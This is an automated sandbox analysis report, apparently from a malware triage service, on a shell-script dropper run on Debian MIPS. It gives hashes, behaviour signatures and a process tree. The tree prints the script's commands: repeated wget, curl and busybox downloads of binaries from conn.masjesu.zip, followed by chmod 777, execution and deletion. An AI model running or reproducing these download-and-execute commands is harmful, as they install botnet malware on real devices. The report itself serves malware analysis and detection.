Analysis
-
max time kernel
101s -
max time network
104s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh
-
Size
10KB
-
MD5
4df258afac082c765345136687fdb240
-
SHA1
0cdbf5333864ea193e81b258a488b509df0bed0a
-
SHA256
88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc
-
SHA512
ad97012e97547376dc1525f12c378e6cf8a864ec108266cc9a8875ae99b65a8a68eca912a1175e43584f1298bee6471c7c67d8f8af9416a5847fdaf39894ad5e
-
SSDEEP
192:FhU03aGPwo229c4kQMNyqJOpsxl47T/U03aGzm229csyxl47TfQMNyqI:FaOkQMNyqJOpsxl47Toyxl47TfQMNyqI
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 994 chmod 1025 chmod 867 chmod 923 chmod 970 chmod 1039 chmod 859 chmod 938 chmod 1002 chmod 1017 chmod 1032 chmod 883 chmod 891 chmod 946 chmod 915 chmod 978 chmod 1010 chmod 750 chmod 848 chmod 962 chmod 907 chmod 899 chmod 930 chmod 954 chmod 986 chmod 803 chmod 820 chmod 875 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM 751 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK 804 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO 821 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe 849 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c 860 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W 868 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 876 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr 884 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a 892 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC 900 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 908 phFMgsQArmVdg945D14ipduIUYswPNrcK1 /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh 916 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG 924 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP 931 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe 939 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c 947 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W 955 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 963 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO 971 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr 979 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a 987 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 995 phFMgsQArmVdg945D14ipduIUYswPNrcK1 /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh 1003 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG 1011 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP 1018 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC 1026 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM 1033 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK 1040 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1024 busybox 809 busybox 904 curl 926 wget 942 wget 1038 busybox 863 wget 887 wget 937 busybox 991 curl 876 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu 965 rm 993 busybox 995 phFMgsQArmVdg945D14ipduIUYswPNrcK1 914 busybox 958 wget 967 curl 997 rm 725 wget 826 wget 841 busybox 880 curl 1006 wget 898 busybox 950 wget 961 busybox 1001 busybox 754 wget 806 wget 831 curl 890 busybox 864 curl 871 wget 878 rm 966 wget 852 wget 1031 busybox 969 busybox 1009 busybox 735 curl 748 busybox 874 busybox 888 curl 855 busybox 919 wget 922 busybox 935 curl 985 busybox 998 wget 777 busybox 807 curl 866 busybox 975 curl 934 wget 1007 curl 1014 curl 879 wget 896 curl 908 phFMgsQArmVdg945D14ipduIUYswPNrcK1 927 curl 929 busybox 767 curl 872 curl 882 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 curl File opened for modification /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP curl File opened for modification /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG curl File opened for modification /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr curl File opened for modification /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK curl File opened for modification /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO curl File opened for modification /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu curl File opened for modification /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh curl File opened for modification /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM curl File opened for modification /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC curl File opened for modification /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c curl File opened for modification /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu curl File opened for modification /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO curl File opened for modification /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a curl File opened for modification /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a curl File opened for modification /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe curl File opened for modification /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh curl File opened for modification /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c curl File opened for modification /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W curl File opened for modification /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 curl File opened for modification /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC curl File opened for modification /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM curl File opened for modification /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG curl File opened for modification /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W curl File opened for modification /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP curl File opened for modification /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr curl File opened for modification /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK curl File opened for modification /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe curl
Processes
-
/tmp/88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh/tmp/88cd1dec7e52a438b0e316ca47298b7b73376741a5c423d7de924a29208782cc.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:722
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- System Network Configuration Discovery
PID:725
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵
- Executes dropped EXE
PID:751
-
-
/bin/rmrm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM2⤵PID:753
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- System Network Configuration Discovery
PID:754
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- System Network Configuration Discovery
PID:777
-
-
/bin/chmodchmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK2⤵PID:805
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- System Network Configuration Discovery
PID:806
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵PID:825
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- System Network Configuration Discovery
PID:826
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- System Network Configuration Discovery
PID:841
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:870
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:871
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:874
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:876
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- System Network Configuration Discovery
PID:879
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- System Network Configuration Discovery
PID:882
-
-
/bin/chmodchmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- System Network Configuration Discovery
PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵PID:906
-
-
/bin/chmodchmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1./phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:908
-
-
/bin/rmrm phFMgsQArmVdg945D14ipduIUYswPNrcK12⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh2⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG2⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/chmodchmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:945
-
-
/bin/chmodchmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c2⤵PID:949
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- System Network Configuration Discovery
PID:950
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:953
-
-
/bin/chmodchmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- File and Directory Permissions Modification
PID:954
-
-
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵
- Executes dropped EXE
PID:955
-
-
/bin/rmrm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- System Network Configuration Discovery
PID:966
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:967
-
-
